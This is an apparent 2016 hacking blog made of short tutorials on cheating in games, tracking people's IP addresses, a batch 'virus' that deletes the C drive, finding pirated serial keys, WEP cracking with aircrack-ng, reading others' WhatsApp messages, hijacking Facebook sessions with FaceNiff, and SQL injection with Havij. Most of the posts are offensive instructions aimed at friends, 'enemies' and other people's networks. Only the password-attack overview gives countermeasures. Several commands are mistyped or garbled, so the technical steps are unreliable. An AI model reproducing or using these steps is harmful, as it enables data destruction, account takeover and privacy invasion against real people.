Wednesday, 17 August 2016

How to Hack Any Game Using Android

How to Hack Any Game Using Android

Do You Have A Android Games? You Want To Buy Everything Free? Then You Need To Hack This Game Just Read Below How!

image



Requirements -:

Rooted Phone

GameKiller apk [ Click Here ]

Time😛

How To Hack any game -:

1) Firstly install GameKiller Apk From The Upside 👆

2) Now GameKiller will ask for Root permissions, Simply Allow The Root Permissions to this app.

3) You can simply minimize the app to proceed further.

4) you can notice an icon on your screen, which is the game killer icon.

5 ) Tap the game killer icon and select the game you want to hack from your games list.

6) Once you in the game make sure to revise, how many cash, money or gems you have in your game.

7) Now that you have to tap on the icon to game killer tab then type in any random number to get instant coins, money , gems or points.

8) At first, you might get what you’d expected so you have to keep adding different value since the similar locations are present there.

9) Now that you have reasonable results, Now add or change rest of the values.

Thursday, 11 August 2016

How To Get Anyone Ip address With Current Location

How To Get Anyone Ip address With Current Location

Ip address Hacking Is a Cool Prank Trick where you Can Get All Details About His ip like, Current Location ,This Is A Amazing Trick to Find anyone Ip.

image



How To Grab Someone Ip-:

1) Firstly Go To This Link http://whatstheirip.com/

2) Type Your Email Address And Click Get Link

3) Now On The Second Page Copy The First Link

4) Now send that copied link to your friends from Facebook and Whatsapp.

5) When your friend, or anyone for that matter, clicks the link, a hidden script will email you their IP address and geo targeting location.

6) Now simply open the email and you will all get victim details, Enjoy... :D

Tuesday, 31 May 2016

How To Make a Dangerous Virus In A Second

How To Make a Dangerous Virus In A Second

Today In This Article,  I'm Gonna Share A Simple And Quick Way To Create A Dangerous In A Second , If You Want To Destroy Your Enemy Computer Then Try This,  Don't Try In Your Computer 😜.

image



How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Friday, 20 May 2016

How To Find software Serial Number Using Google

How To Find software Serial Number Using Google

Hey Folks, today I'm gonna Share A easy way to Find Any Software Serial Number Using Google  , This Trick Is Very Useful For Searching Serial number.

image



Follow The Steps -:

   1. Go to Google Search

    2. Then type  Software Name 94FBR
Replace Software Name with the name of software whose serial key you want to find
Eg: To find serial key of Nero i will type Nero 94fbr

    3. Now press Enter and you will find serial key of software

Wednesday, 30 March 2016

Top Password Cracking Attack For Hackers

Top Password Cracking Attack For Hackers

image



BRUTE FORCE ATTACK

Hackers can crack any sort of password by brute force attack. This attack involves any number of possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.
Countermeasure:
You should you long passwords which are a combination of uppercase lowercase special character and digits. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.

SOCIAL ENGINEERING

With this method a person can gain access to your password by manipulating to trust him and then you grant your password yourself.  For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.
Countermeasure:
If someone asks you for a password and pretends to be someone you must first confirm his/her identity by asking few questions. In this way you will not fall in a trap.

KEYLOGGERS AND RATS

In this method the hacker send keylogger to the victim. With this the hacker has the power of monitoring everything that the victim does on his/her system. Every keystroke is logged including passwords. Moreover hacker can even control the victims computer.
Countermeasure:
If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

PHISHING

It is the most popular and easiest way to have someone’s account details. In this the hacker sends a fake page that looks just like the original one like of facebook or gmail to the victim.
When someone logins through that fake page the details will be sent to the hacker.
Countermeasure:
Its easy to avoid phishing attacks.  The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two “b”). Always make sure that websites url is correct.

RAINBOW TABLE

This table is a list of hashes that has been precomputed for possible combination of characters. Password hash is the password which has been gone through a mathematical algorithm like md5. It is a one way encryption technique in which if once a password is hashed you cannot get back to the original string.  It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords.
Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string (“”) is d41d8cd98f00b204e9800998ecf8427e
Countermeasure:
Use long and complex passwords because creation of these table will require a longer time and hug resources.
How To hack Wi-Fi Password In Linux Ubuntu

How To hack Wi-Fi Password In Linux Ubuntu

This Is A Success Method To Hack Any Wi-Fi Network Read It Below.

image



Follow The Steps -:

(1) install aircrack
sudo apt-get install aircrack-ng
For hacking passwords in ubuntu , first we have to install air crack program in operating system.
Install aircrack
Sudo apt-get install aircrack-ng
For rooting , type “su-“ and type your password.
Now write the commands in terminal mode:
#iwconfig wlan0 mode monitoring
Note: Do take notice if any kind of error occurs type “#iwconfig” in a terminal to check for your wireless.
Now scan for a wireless network which will include educational purpose. Now type commands:
#airdump-ng wlan0

(2) You need to go in root first. For this purpose type “su –“ and type your password.

(3) Now type following command in terminal
Code:
# iwconfig wlan0 mode monitoring
Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4) After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
Code: # airodump-ng wlan0

(5)  Once you have created one, abort the process with shortcut key : Ctrl+C. Now there is a need to collect information about the network. Firstly, copy the MAC address of the access point which stands for BSSID (example: 00:11:EH:B8:…..). Another point to be noted is to know the channel and it’s current working. (example: currently working under CH-5). Now , hather information with airodump-ng. Write the following code:
#airodump-ng-w wep –c 5 –bbsid 00:11:EH:B8:….wlan0

6.)Now. Open another terminal to use ARP Reply Attack which increases the amount of data packets and gather the initializing vectors or IV of the chosen access points earlier. Write the following code:
#Aireplay-ng -3 –b  00:11:EH:B8:….wlan0

(7) Now again move back to the first terminal and have a look at the data packets. Nearabout 20000 packets have been  collected yet. If it is so, abort both airodump-ng and aireplay-ng. To decode the key of wireless network, we are provided with every information.  This all can be done with aircrack:

#aircrack-ng wep-03.cap
How To Install Backtrack On Android And Hack Wi-Fi

How To Install Backtrack On Android And Hack Wi-Fi

This Is best Working Method To Hack A Wi-Fi Network And In This Tutorial I Will Show You How You Can Install Backtrack On Your Android Device Please Note Your Device Must Be Rooted Device If Not Then Try To Root It.

image



Required -:

1. Rooted Android Device
2. Download Backtrack ARM
3. Download BusyBox
4. Download Android VNC
5. Download Android Terminal
6. If you are using PC then you need 7zip for extraction otherwise you can use Download Zarachiever Or Es File Explorer on you android phone.

Follow The Steps -:

1) First extract the BT5
-GNOME-ARM.7z
. and copy “BT5” folder and then put in your android root directory. For example- My Phones Root Directory is /sdcard. (As different androids will have different root directories).

2) Install all apps that given in requirements.

3) After installing BusyBox application open it and wait until it finish loading and then click on Smart install button of the application
In your android open terminal app and then execute the given commands.

su

cd/sdcard/BT5

sh bootbt

4) When su commands executed it will ask for Super USer access you have to click on Grant on the prompt appear.
Now after this type the commands:

export USER=root

vncpasswd

5) Now you will asked to enter the password, enter of your choice and press enter.
Now type the below command:-

tightvncserver -geometry 1280×720
The terminal emulator will creates the localhost to connect it to VNC server. Now note the localhost port marked red below. Now minimize the terminal emulator.
Open the android VNC and type the following settings given:-

Nickname : BT5
Password : same password as entered in terminal
Address : localhost
Port : 5906

Process completed! Now just click on Backtrack on your Android Phone.
How To hack and Read Whatsapp Message in Android

How To hack and Read Whatsapp Message in Android

Today I'm Sharing A easy To read Whatsapp Message With Your Android Device.

image



Follow the Steps -:

1) First Backup of your Whatsapp Messages

2) Then download Next android app named Tri Crypt. This android app decrypt whatsapp crypt 5 format to readable .db(database) format.

3) Open Tri Crypt Android app and Click on decrypt whatsapp messages.

4) Now download Sqlite Editor  android app for reading whatsapp .db file.

5) Open Sqlite Editor android app go to Files. Here we have file and directories. We find msgstore.db file in these directories.

6) Now follow this path in Files ******find sdcard folder <

7) Now read all the whatsapp messages in Android Phone.

8) You can read other Whatspp user data when you get his msgstore.db file.
How To Hack Facebook Using Connected Wi-Fi

How To Hack Facebook Using Connected Wi-Fi

Today I'm Sharing A Easy Way for Android rooted Users You Can Hack Facebook Account By Wi-Fi, How?  so When You Connected To Any Wireless Network And The Admin Of Wi-Fi Doing Access Their Facebook So You Can Access His Also If You Are Connected To The Same Wi-Fi Not Just Facebook You Can Hack Anything Which Admin Using.

image



Follow The Steps -:

1) Download Cracked FaceNiff

2) Once the app is downloaded, install it and then connect the Wi-Fi of your victim.

3) Open the faceNiff app and press the start button on the top. If it ask you to allow permission for the app, do so.

4) It will now be monitoring activity. Anyone who uses Facebook, YouTube, twitter, amazon on the network you are connected to will show up on your phone. Simply click on them and you will be logged in into their account.

Note: It might take 2-3 minutes to load up the screen. So have patience.
If nothing is showing up, try using stealth method in FaceNiff. Some rooters prevent these kinds of hacks; stealth method will attempt to bypass this.
How The Hackers Use Sql Injection

How The Hackers Use Sql Injection

Today I'll Show You How The hackers Use Sql injection For Get Access On The Site This Trick For Beginners Don't Do It For Illegal Work.


image



At First You Need To Know This -:

1.Havij SQL Injection tool

2.SQL vunerable site(take examplesite.com/catalogo_nuevos_detalle.php?id=2)

To check sql vunerable site add (‘) at the end of site url and if you get sql error in your syntax then it means your site is SQL vunerable.

You Are Ready Now Follow the Steps :-

1.Open Havij and paste the site URL in the target field and then wait for havij to get details and databases of the website.

2.After that click on the available database of the site and click on Get Tables.On clicking Get Tables Havij will look for the tables available in the database.

3.After scanning Havij will get all the tables available.Here you has to just find the tables named as admin,users and something similarto these.Select the similar words and click on the Get Columns.Havij will then get all the coloumns available in the users table.

4.Now select the columns and then click on the Get Data.Havij will then look for the data available in coloumns login and password i.e username and password.The username and the password you get is encrypted in mdm language and not in real text.To crack the encrypted password just copy the password and click on the MD5 tab in Havij and paste the encrypted password in Md5 hash field and hit start.Havij will then try to crack the password.

5.Now click on Find Admin tab in Havij and then click Start.It will check the admin panel of the website.Open the admin panel in web browser and login with username and password and you are now in admin panel of the website.You has succesfully logged to the website and has hacked the website.
Conclusion:

Using the above steps you can hack up the website if it is vunerable to the Sql attack unless you can find out other ways also but to great extent the method of SQL attack is the best for the hacking of websites.The above steps is for Havij program but there are also many programs available that does the same process to hack up the websites.